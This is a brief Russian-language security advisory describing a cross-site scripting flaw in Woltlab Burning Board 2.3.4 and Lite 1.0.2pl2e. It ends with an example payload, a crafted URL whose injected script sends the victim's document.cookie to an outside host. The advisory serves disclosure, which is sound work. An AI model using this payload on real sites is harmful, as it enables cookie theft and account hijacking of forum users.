Программа:
Woltlab Burning Board 2.3.4
Woltlab Burning Board Lite 1.0.2pl2e

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в сценарии "acp/lib/class_db_mysql.php".
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольный код сценария в браузере жертвы в контексте безопасности
уязвимого сайта.

Пример:

/wbb/xx.php?<script>location.href=’http://yoursite.com/xss.php? cook=’+escape(document.cookie)</script>

 



Оставить мнение